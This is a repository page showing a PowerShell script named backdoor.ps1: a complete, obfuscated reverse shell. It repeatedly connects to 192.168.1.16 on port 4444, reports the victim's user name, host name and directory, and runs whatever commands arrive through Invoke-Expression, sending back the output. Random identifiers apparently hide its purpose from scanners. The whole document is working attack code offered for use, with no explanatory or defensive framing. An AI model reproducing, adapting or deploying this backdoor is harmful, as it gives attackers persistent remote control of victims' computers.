-
Notifications
You must be signed in to change notification settings - Fork 0
/
backdoor.ps1
99 lines (88 loc) · 3.16 KB
/
backdoor.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
class yVxHvbE {
[string]$nuIPAwBcfAxzBQJJpL = "192.168.1.16"
[int]$EsEYWOSMSsuAUri = 4444
$ejuXmHrynoUYWINikm
$hadhd
$MLTvqiVKKARhbDGlfsHha
$CdEnJdZqXuHumw
$UcbqEQdnYBDjfCa
$KAogBvCpShzL
[int]$mMLrnvyiLyskDy = 50*1024
HEZDN() {
$this.hadhd = $false
while ($true) {
try {
$this.hadhd = New-Object Net.Sockets.TcpClient($this.nuIPAwBcfAxzBQJJpL, $this.EsEYWOSMSsuAUri)
break
} catch [System.Net.Sockets.SocketException] {
Start-Sleep -Seconds 5
}
}
$this.xCNABvoOyQAyNdioYe()
}
xCNABvoOyQAyNdioYe() {
$this.ejuXmHrynoUYWINikm = $this.hadhd.GetStream()
$this.CdEnJdZqXuHumw = New-Object Byte[] $this.mMLrnvyiLyskDy
$this.KAogBvCpShzL = New-Object Text.UTF8Encoding
$this.MLTvqiVKKARhbDGlfsHha = New-Object IO.StreamWriter($this.ejuXmHrynoUYWINikm, [Text.Encoding]::UTF8, $this.mMLrnvyiLyskDy)
$this.UcbqEQdnYBDjfCa = New-Object System.IO.StreamReader($this.ejuXmHrynoUYWINikm)
$this.MLTvqiVKKARhbDGlfsHha.AutoFlush = $true
}
AHhGOBcjQzhpQ() {
$this.HEZDN()
$this.FmLspipyMVojEalfYh()
}
kAkVrCzLaClqqwyCrXhtVmL($fDdfMmOmFdEsFuyxIdQgwKo) {
try {
[byte[]]$QOhKApKYKVivwRN = [text.Encoding]::Ascii.GetBytes($fDdfMmOmFdEsFuyxIdQgwKo)
$this.MLTvqiVKKARhbDGlfsHha.Write($QOhKApKYKVivwRN, 0, $QOhKApKYKVivwRN.length)
} catch [System.Management.Automation.MethodInvocationException] {
$this.AHhGOBcjQzhpQ()
}
}
[string] PnVGn() {
try {
$ytAYdQ = $this.ejuXmHrynoUYWINikm.Read($this.CdEnJdZqXuHumw, 0, $this.mMLrnvyiLyskDy)
$oDcBbY = ($this.KAogBvCpShzL.GetString($this.CdEnJdZqXuHumw, 0, $ytAYdQ))
return $oDcBbY
} catch [System.Management.Automation.MethodInvocationException] {
$this.AHhGOBcjQzhpQ()
return ""
}
}
[string] EssAsMIExYYM($JfYpHWYCnLYjPBNEfBmbI) {
Write-Host $JfYpHWYCnLYjPBNEfBmbI
try {
$eMjTKJFgF = Invoke-Expression $JfYpHWYCnLYjPBNEfBmbI | Out-String
}
catch {
$Ncotl = $_.Exception
$CupWTVpyEwCxWKCsoamJcpTd = $_.Message
$eMjTKJFgF = "`n$_`n"
}
return $eMjTKJFgF
}
[string] rhinta() {
$spagmteoLukiRqLgkTlDy = [Environment]::UserName
$PxSDQXhavTQTH = [System.Net.Dns]::GetHostName()
$aAgaPNH = Get-Location
return "$spagmteoLukiRqLgkTlDy@$PxSDQXhavTQTH [$aAgaPNH]~$ "
}
FmLspipyMVojEalfYh() {
while ($this.hadhd.Connected) {
$this.kAkVrCzLaClqqwyCrXhtVmL($this.rhinta())
$oDcBbY = $this.PnVGn()
$eMjTKJFgF = "`n"
if ([string]::IsNullOrEmpty($oDcBbY)) {
continue
}
$eMjTKJFgF = $this.EssAsMIExYYM($oDcBbY)
$this.kAkVrCzLaClqqwyCrXhtVmL($eMjTKJFgF + "`n")
$this.ejuXmHrynoUYWINikm.Flush()
}
$this.hadhd.Close()
$this.AHhGOBcjQzhpQ()
}
}
$kkRAfuYQTWzmq = [yVxHvbE]::new()
$kkRAfuYQTWzmq.AHhGOBcjQzhpQ()